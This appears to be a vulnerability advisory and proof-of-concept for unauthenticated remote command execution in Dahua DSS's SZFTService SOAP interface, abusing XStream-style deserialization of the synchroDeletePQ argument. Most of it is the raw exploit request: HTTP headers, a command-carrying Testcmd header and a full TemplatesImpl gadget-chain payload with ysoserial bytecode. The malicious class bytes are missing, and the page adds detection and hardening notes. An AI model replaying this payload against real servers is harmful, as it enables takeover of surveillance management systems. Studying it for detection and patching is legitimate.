漏洞描述
大华 DSS 的 `/itc/ws/SZFTService` SOAP 接口存在远程命令执行漏洞：`synchroDeletePQ` 操作的字符串参数 `arg0` 会被服务端当作对象图进行反序列化。从载荷中的 `dynamic-proxy`、`linked-hash-set`、`serialization='custom'` 以及双下划线转义的字段名(`__name`、`__bytecodes`)可推断该反序列化器为 XStream 风格(需结合服务端实现确认)。攻击者可借此投递公开的 gadget 链(CompositeInvocationHandlerImpl → NullProvider/DTraceProbe → `TemplatesImpl.getOutputProperties`)加载任意字节码,从而执行任意命令获取服务器权限;PoC 中未携带任何凭据,推测无需认证(待确认)。下方请求头 `Testcmd: echo f1ebad623f` 推测为被加载类读取的待执行命令,响应中回显该随机标记即为验证成功,具体以被省略的第一段字节码为准。注意:页面中第一段 `byte-array` 已被删除,`Content-Length: 7715` 与实际正文长度不一致,重放前必须重新计算;`Host` 头为空需自行填写。防护建议:限制对 `/itc/ws/` 下 SOAP 接口的网络访问,对 XStream 反序列化启用允许列表(白名单),并在 WAF/IDS 上对发往该路径且正文含 `dynamic-proxy`、`TemplatesImpl` 或 `__bytecodes` 的 POST 请求告警;页面未给出厂商通告编号或修复版本,请向厂商确认。
POST /itc/ws/SZFTService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Testcmd: echo f1ebad623f
Content-Type: text/xml;charset=UTF-8
Content-Length: 7715
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.dhsoft.com">
<soapenv:Header/>
<soapenv:Body>
<!-- Sink: the synchroDeletePQ operation takes a single string argument (arg0).
     The CDATA below is not plain data; the service apparently hands it to an
     XStream-style deserializer (the dynamic-proxy / linked-hash-set aliases,
     serialization='custom' and the double-underscore field names are XStream
     serialization conventions), so the caller controls the whole object graph.
     NOTE(review): inferred from the payload format; confirm against the service
     implementation. -->
<web:synchroDeletePQ>
<!--type: string-->
<!-- Gadget chain (publicly known TemplatesImpl chain):
     1. linked-hash-set inserts a dynamic proxy implementing java.util.Map,
        which calls hashCode() on it during deserialization.
     2. CompositeInvocationHandlerImpl has an empty classToInvocationHandler
        map, so every call falls through to defaultHandler (sun.tracing.NullProvider).
     3. NullProvider's probes map Object.hashCode() to a DTraceProbe whose
        implementing method is TemplatesImpl.getOutputProperties() on the
        embedded TemplatesImpl.
     4. getOutputProperties() defines the classes in __bytecodes and
        instantiates the translet, executing attacker-supplied code.
     The first byte-array (the malicious translet class, name "Pwnr") is redacted
     on this page; the second decodes to the ysoserial helper class
     ysoserial/payloads/util/Gadgets$Foo. __transletIndex=-1 and
     __indentNumber=0 are the usual values for this chain.
     Detection: POST to /itc/ws/SZFTService with dynamic-proxy, TemplatesImpl or
     __bytecodes in the body. Operational notes: the HTTP Content-Length must be
     recomputed if this body changes; do not place comments inside the CDATA,
     its content is payload text consumed by the inner parser. -->
<arg0><![CDATA[<linked-hash-set>
<dynamic-proxy>
<interface>map</interface>
<handler class='com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl'>
<classToInvocationHandler class='linked-hash-map'/>
<defaultHandler class='sun.tracing.NullProvider'>
<active>true</active>
<providerType>java.lang.Object</providerType>
<probes>
<entry>
<method>
<class>java.lang.Object</class>
<name>hashCode</name>
<parameter-types/>
</method>
<sun.tracing.dtrace.DTraceProbe>
<proxy class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<default>
<__name>Pwnr</__name>
<__bytecodes>
<byte-array>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</byte-array>
<byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>
</__bytecodes>
<__transletIndex>-1</__transletIndex>
<__indentNumber>0</__indentNumber>
</default>
<boolean>false</boolean> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
</proxy>
<implementing__method>
<class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
<name>getOutputProperties</name>
<parameter-types/>
</implementing__method>
</sun.tracing.dtrace.DTraceProbe>
</entry>
</probes>
</defaultHandler>
</handler>
</dynamic-proxy>
</linked-hash-set>]]></arg0>
</web:synchroDeletePQ>
</soapenv:Body>
</soapenv:Envelope>